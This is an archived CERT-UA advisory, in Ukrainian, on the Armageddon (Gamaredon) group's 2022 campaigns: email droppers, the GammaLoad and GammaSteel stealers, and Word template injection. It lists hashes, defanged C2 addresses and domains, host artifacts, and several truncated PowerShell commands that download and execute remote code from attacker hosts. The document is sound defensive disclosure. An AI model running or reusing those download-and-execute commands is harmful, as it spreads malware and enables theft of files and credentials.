{ "id": "86f0ea25-d3d6-4b48-bac5-bb57696ba496", "created_at": "2026-04-06T00:18:02.683437Z", "updated_at": "2026-04-10T13:12:34.407966Z", "deleted_at": null, "sha1_hash": "4531c884c41b44836760e431d72e3f78e1e001fb", "title": "CERT-UA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6510242, "plain_text": "CERT-UA\r\nArchived: 2026-04-05 14:22:15 UTC\r\nЗагальна інформація\r\nУрядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA відслідковується\r\nактивність групи UAC-0010 (Armageddon).\r\nПротягом першого півріччя 2022 року основним способом реалізації зловмисного задуму є\r\nрозповсюдження засобами електронної пошти (зі скомпрометованих акаунтів і на приватні електронні\r\nадреси) HTM-дроперів (в тому числі, в UTF-16 кодуванні), що ініціюють ланцюг доставки\r\nGammaLoad.PS1 на комп'ютер жертви.\r\nМетою зловмисників, серед іншого, є викрадення файлів за визначеним переліком розширень, а також\r\nавтентифікаційних даних Інтернет-браузерів, для чого застосовується GammaSteel.PS1 та\r\nGammaSteel.NET, відповідно. Вірогідно, GammaSteel.PS1 є PowerShell-реалізацією раніше\r\nвикористовуваного HarvesterX.\r\nКрім того, однією з тактик зловмисників є ураження файлу шаблону\r\nC:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm за допомогою макросу, код\r\nякого забезпечує генерацію URL-адреси та її додавання до створюваного документу у вигляді посилання\r\n(так званий \"Remote template injection\"). Зазначене призведе до інфікування всіх документів, які\r\nстворюються на комп'ютері, та їх подальшого ненавмисного розповсюдження користувачем.\r\nЯк правило, для забезпечення персистентності та запуску пейлоадів використовуються заплановані\r\nзавдання, гілка реєстру Run, а також змінні середовища. Активно використовується PowerShell\r\n(powershell.exe), а також wscript.exe, mshta.exe.\r\nІндикатори компрометації\r\nФайли:\r\n136bd98383e5b3e06b63f2d7c72a3d4d 81d8c20a19e1c2c3e5bfd6f8a39499321f42b07f6b94c9e0bb98fd6cfd4355a8\r\n82e0e0838c6c8abf103d4e5dab78b703 f2f6077597d1fdb84bbb35aebd169af522767bc3a6aae58e778c429626f376a3\r\n1bba824db40a7ce52313ed76b55ac5fd f628fa53fc3f91c1d812246291b3a188904ab091c735e8dc7ed644103a0eb5c6\r\n897c859e25576146f4e03329f076bd40 2cb17eb3450b4cfad148427986410cda69d47a124a7dea43c577a55569ff3761\r\n9da690670ff22a610f632251538888c4 2dfef7c52c05c3b88818edd7764ef1f1d41c1450918441e6a5d8b1518b80ac3e\r\ndb5606f0010bb7fdc1e10174055b0f93 968f841df2fd5b7458d15569b756088691e6d4a04e5f6f22df1c773e1fe35129\r\na73326f0373131fdd4814b9fc67c7e34 c82728665fafb66828f3fe2d9ee28b2e670e958abc1f5dda6c5e460db2502207\r\n7d200a3eb82b9b3c60daa0866f9b6db9 6cccc179db19c405cc313f60d3bb09e00f7b273ec3c6ddf03ae4cba3fcac961d\r\n904803767f7d3c8f2f947f40f8ba6272 afcb200cf4a646397f67c37d396cd5573db2575ae945b3251dfb6d285d1e6724\r\n9db94f4c9dba8adb2c13f1962c1fcaa6 f1f4ed4122564c90b473617d9989a2a90af1d93c4b75c8cfecd564ff71f803a0\r\n7f0270c87e1d14d95c51cd303dbab195 bcb63de0b16c449b054982ad1d4c23810a396e061ae45801df4d64acf4e82674\r\n6c6fbdd3dcf6919d6d2aff8065892b2c 1b59868b460359f46c6ae0a01b6f34c89a33b79992a03573fc40bd3c501cbea4\r\nhttps://cert.gov.ua/article/1229152\r\nPage 1 of 7\n\n66d7796b61ddac70f748cbc1ff26dfef\r\n00fe49d9fde36aace2e9c35962ac11f8595b8452d84ba02f4511754ced831d66\r\n949d29f97c11abeab41075bf2a6e9dfd6f2004a5b3f4f1c84c0e0e08181cfb8bbc0f50617e58d57cecddf4789587880a\r\n94031409d9f552e174dcc66e2b3bd45b 564aba6e5366347b1e522b2af7a46fa54e6d23af4ce17b2dd3a5d45d925c7aa4\r\n54cfc650263a61a5c372dd8b4fa6e9e5 788dc18de55d73027011a0b109b4b795e6ae485bdda7dd07deecab6af386170c\r\nb8686b1038a1f4c162c1f0454169fec8 7d2c607bb9627e14d572356ff653b587ea0d7f7b2c1f4ab45bb979b81f9369ae\r\na34a506a965669daf00075c5a22f7187 24fe5b916433ae295685dddcc5c808fb4cd3d3a2c3d999b721f4e650773b1ed4\r\nf046e20e2429a47194cf7cb76db1dfd2 c19dbecf59908f530a63705af62a3596531f7eecbb971a2926670fb4c0697a2c\r\ne45eeb97da3155179fb1c626ae930eda 79c340f1d8c78b96d4e92a78d9c407494769df79ab491dfe2b1955f26af4e388\r\n7622a8f0bb0b97e17e186758f730af2d 143cc8dade3ac835c9114333e05544b52dc57a1273cbdd4aca38253a710c92ab\r\nafa8f2b0ea413c568549360e8dfebe0a 6cb0ef2538cd074fbcccca5a96bb21538529220eeeeaca63e06a18cbbc6a9eb4\r\nea8c0a9bccd9fd91b78e06a2a58b559b 430206ba1fbd0c869b71608ad1808febfb067e086d0b330225b5afcddc1af352\r\nc5ab39da6f015a26edb916a0e37b9d57 c172c8733c92d914574290eb46d8a6c1b49387d8d4dceafc3e13d953395c9710\r\nb6840f52a5c655d22c70f14333238409 1928ea04a52ea5ced87305cc001e693385ecbb8d3b4c64c1288d4b223de841dd\r\n7e5ea867d5f4ed45dd26e304cef98678 452d40893e9973ec5e4779ea830320d80999b09a36113b7d86de866a02823a3c\r\n859278e356de512859cd5bb94d09e9e4 dcb69e1c9a6bff950481cf1f493b3e9665133e9afae528f0d38d72e83607a6d0\r\ndf887652a92d1103d5131aa68757b2cc 9b81fbe9f7157e7873862fe7fabd9df5fdb8197bf1cc01b5e34cbebf5ff0de13\r\n83b3fd87ee87be5708326f99d4db3bbd f96489503934b654e00cbd0c48845d66aaf3b91f5bd53fd05d7ecfc48a66dc20\r\nffb49d24a6691bdb3f5f58a632ac4447 1113fc222132460fe481ed0a62fb3fe1426bc920cdb01d334c7a7a6ef952dfee\r\n396606ccd506b565d8590cae99be4950 7e3cfa63b31ed9e4606e43b29a704924a27b62d6b9a1360b462d9998deed549f\r\n3376d2b5e6f99d68824b93bad33e4884 cb81b6516f13844c653a9fcbbbeed099dde5be307ec66523be7678d577dca477\r\n9428c3fb7d4ae783a348561d5fa7b39e 88dc766c51f20c93b670bd67b543b70e8d627c9afc041ee74aa6b64c59eb1c7d\r\ndc7266e0eed4a67e1bea6e044c114387 a2361ca9fd84fd41d62628e2310317831f47f8e973c2bda24dadc0972fb983d6\r\na1b63c92db35c90e1058813919446c21 9c724d00f28b3453e283e5b0ef5c8455bb61d4c902c53cfb38f07ffb4e17e18d\r\n20531cf42e4f44a96c4aeb4cd7e2d70e a0c2429616e7bf8a36951d45cbc72a1eab4d4a1a1e8266753a75bdd683737814\r\nМережеві:\r\n138[.]197.199.151\r\n139[.]59.166.152\r\n144[.]202.61.174\r\n157[.]245.99.132\r\n159[.]203.11.73\r\n168[.]100.10.184\r\n178[.]62.108.75\r\n192[.]241.133.108\r\n194[.]180.174.73\r\n45[.]61.138.226\r\n45[.]61.139.22\r\n45[.]77.196.211\r\n45[.]77.237.252\r\n66[.]42.102.21\r\n70[.]34.218.135\r\nhXXp://138[.]197.199.151/get[.]php\r\nhXXp://139[.]59.166.152/get[.]php\r\nhXXp://144[.]202.61.174/get[.]php\r\nhXXp://157[.]245.99.132/get[.]php\r\nhttps://cert.gov.ua/article/1229152\r\nPage 2 of 7\n\nhXXp://159[.]203.11.73/get[.]php\r\nhXXp://178[.]62.108.75/get[.]php\r\nhXXp://192[.]241.133.108/get[.]php\r\nhXXp://194[.]180.174.73/1.txt\r\nhXXp://194[.]180.174.73/pswd[.]php\r\nhXXp://45[.]77.196.211/get[.]php\r\nhXXp://45[.]77.237.252/get[.]php\r\nhXXp://66[.]42.102.21/get[.]php\r\nhXXp://70[.]34.218.135/get[.]php\r\nhXXps://45[.]61.138.226\r\nhXXp://atlantar[.]ru/get.php\r\nhXXp://motoristo[.]ru/get.php\r\nhXXp://lover.printing82.detroito[.]ru/DESKTOP-P5BRFLE/luncheon.nab\r\nmoolin[.]ru\r\natlantar[.]ru\r\nbubenci[.]ru\r\ncallsol[.]ru\r\nclipperso[.]ru\r\ncooperi[.]ru\r\ndetroito[.]ru\r\nfarafauler[.]ru\r\nfishitor[.]ru\r\nflayga[.]ru\r\nganara[.]ru\r\ndetroito[.]ru\r\nhawksi[.]ru\r\nhofsteder[.]ru\r\nkilitro[.]ru\r\nkurapat[.]ru\r\nleonardis[.]ru\r\nlnasfe[.]ru\r\nlopasts[.]ru\r\nmafirti[.]ru\r\nmetanat[.]ru\r\nmitlubald[.]ru\r\nmoolin[.]ru\r\nmotoristo[.]ru\r\npaparat[.]ru\r\npasamart[.]ru\r\nqkcew[.]ru\r\nrncsq[.]ru\r\ntarlit[.]ru\r\ntbwelo[.]ru\r\nwicksl[.]ru\r\nxcqef[.]ru\r\n(Telegram-акаунти, що використовуються для публікації IP-адреси серверу управління)\r\nhttps://cert.gov.ua/article/1229152\r\nPage 3 of 7\n\nhXXps://t[.]me/s/chanellsac\r\nhXXps://t[.]me/s/digitli\r\nhXXps://t[.]me/s/zalup2\r\nhXXps://t[.]me/s/zapula2\r\nhXXps://t[.]me/s/topnewsas\r\nhXXps://t[.]me/s/chabgei\r\nhXXps://t[.]me/s/toporsa\r\n(сервіси, що використовуються для DNS-резолву доменів)\r\nhXXps://dnslookup.seowebchecker[.]com/\r\nhXXps://ip-api[.]com/csv/\r\nhXXps://tools.nexcess[.]net/dns-check\r\nhXXps://viewdns[.]info/reverseip/?host=\r\nХостові:\r\nC:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\r\nC:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Шаблони\\Normal.dotm\r\nC:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Шаблоны\\Normal.dotm\r\n%USERPROFILE%\\NTUSER.DAT.TM.defect.exe\r\n%USERPROFILE%\\NTUSER.DAT.TM.defect.ini\r\n%USERPROFILE%\\dedicate.exe\r\n%USERPROFILE%\\dedicate.ini\r\n%USERPROFILE%\\ntusers.ini\r\n%USERPROFILE%\\Favorites\\judge\r\n%USERPROFILE%\\NTUSER.DAT.TMContainer.f4v\r\n%USERPROFILE%\\decay.bmp\r\n%USERPROFILE%\\des.nds\r\n%LOCALAPPDATA%\\_profiles_new.ini\r\n%TMP%\\micro.txt\r\n(Заплановані завдання)\r\nC:\\Windows\\System32\\Tasks\\creditcard.session\r\nC:\\Windows\\System32\\Tasks\\finance.create\r\nC:\\Windows\\System32\\Tasks\\finance.session\r\nC:\\Windows\\System32\\Tasks\\session.finance\r\nC:\\Windows\\System32\\Tasks\\ПОРНО.lNK\r\nC:\\Windows\\System32\\Tasks\\НА ДОКЛАД.lNK.lNK\r\nC:\\Windows\\System32\\Tasks\\ХЛАМ.lNK.lNK\r\nC:\\Windows\\System32\\Tasks\\РАЗОБРАТЬ.lnk.lNK\r\nC:\\Windows\\System32\\Tasks\\НЕ СМОТРЕТЬ.lNK\r\nC:\\Windows\\System32\\Tasks\\МОИ ФОТО.lNK\r\nC:\\Windows\\System32\\Tasks\\КОМПРОМАТ.LNK\r\nC:\\Windows\\System32\\Tasks\\КОРЗИНА.LNK\r\nC:\\Windows\\System32\\Tasks\\autowake\r\nC:\\Windows\\System32\\Tasks\\winsparcontrols\r\nhttps://cert.gov.ua/article/1229152\r\nPage 4 of 7\n\nC:\\Windows\\System32\\Tasks\\Wikipedia Search Tools\r\nC:\\Windows\\System32\\Tasks\\Preferences Style Configurator\r\nC:\\Windows\\System32\\Tasks\\MsCtfMonitor\r\nC:\\Windows\\System32\\Tasks\\regidlebackup\r\nC:\\Windows\\System32\\Tasks\\ScheduledDefrag\r\nHKCU\\Environment\\Include (змінна середовища)\r\nтаємно.rtf.lnk (назва файлу)\r\nформа_нова.rtf.lnk (назва файлу)\r\n(команди)\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -nologo iex (iex (get-c\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $aaa = (New-Object system.Net.WebClient).do\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $dom=[string]$(Get-Random)+'.ganara.ru';$ip\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $ip = [System.Net.DNS]::GetHostAddresses([s\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $ip=[System.Net.DNS]::GetHostAddresses([st\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $tmp = $(New-Object net.webclient).Download\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WiNDOwSTYle HIddEn -nOLoGO INvokE-exPRessi\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nol -nop echo (INVOKE-EXPRESSION(new-objec\r\nC:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -nol -nop echo ([system.text.encoding\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -nologo Invoke-Expressi\r\nfunction Random(){ $rnd='d' +-join ((48..57) + (97..122) | Get-Random -Count $( Get-Random -Minimum 1\r\npowershell -w hidden -c (iex echo (iex (new-object net.webclient).downloadstring('hXXp://motoristo.ru\r\npowershell -w hidden -nol -nop -c (iex ([string]::join('' ((101 99 104 111 32 40 105 101 120 32 40 1\r\nГрафічні зображення\r\nhttps://cert.gov.ua/article/1229152\r\nPage 5 of 7\n\nhttps://cert.gov.ua/article/1229152\r\nPage 6 of 7\n\nSource: https://cert.gov.ua/article/1229152\r\nhttps://cert.gov.ua/article/1229152\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "origins": [ "web" ], "references": [ "https://cert.gov.ua/article/1229152" ], "report_names": [ "1229152" ], "threat_actors": [ { "id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308", "created_at": "2022-10-25T15:50:23.320841Z", "updated_at": "2026-04-10T02:00:05.356444Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Gamaredon Group", "IRON TILDEN", "Primitive Bear", "ACTINIUM", "Armageddon", "Shuckworm", "DEV-0157", "Aqua Blizzard" ], "source_name": "MITRE:Gamaredon Group", "tools": [ "QuietSieve", "Pteranodon", "Remcos", "PowerPunch" ], "source_id": "MITRE", "reports": null }, { "id": "d5156b55-5d7d-4fb2-836f-861d2e868147", "created_at": "2023-01-06T13:46:38.557326Z", "updated_at": "2026-04-10T02:00:03.023048Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "ACTINIUM", "DEV-0157", "Blue Otso", "G0047", "IRON TILDEN", "PRIMITIVE BEAR", "Shuckworm", "UAC-0010", "BlueAlpha", "Trident Ursa", "Winterflounder", "Aqua Blizzard", "Actinium" ], "source_name": "MISPGALAXY:Gamaredon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "61940e18-8f90-4ecc-bc06-416c54bc60f9", "created_at": "2022-10-25T16:07:23.659529Z", "updated_at": "2026-04-10T02:00:04.703976Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Actinium", "Aqua Blizzard", "Armageddon", "Blue Otso", "BlueAlpha", "Callisto", "DEV-0157", "G0047", "Iron Tilden", "Operation STEADY#URSA", "Primitive Bear", "SectorC08", "Shuckworm", "Trident Ursa", "UAC-0010", "UNC530", "Winterflounder" ], "source_name": "ETDA:Gamaredon Group", "tools": [ "Aversome infector", "BoneSpy", "DessertDown", "DilongTrash", "DinoTrain", "EvilGnome", "FRAUDROP", "Gamaredon", "GammaDrop", "GammaLoad", "GammaSteel", "Gussdoor", "ObfuBerry", "ObfuMerry", "PlainGnome", "PowerPunch", "Pteranodon", "Pterodo", "QuietSieve", "Remcos", "RemcosRAT", "Remote Manipulator System", "Remvio", "Resetter", "RuRAT", "SUBTLE-PAWS", "Socmer", "UltraVNC" ], "source_id": "ETDA", "reports": null }, { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434682, "ts_updated_at": 1775826754, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4531c884c41b44836760e431d72e3f78e1e001fb.pdf", "text": "https://archive.orkl.eu/4531c884c41b44836760e431d72e3f78e1e001fb.txt", "img": "https://archive.orkl.eu/4531c884c41b44836760e431d72e3f78e1e001fb.jpg" } }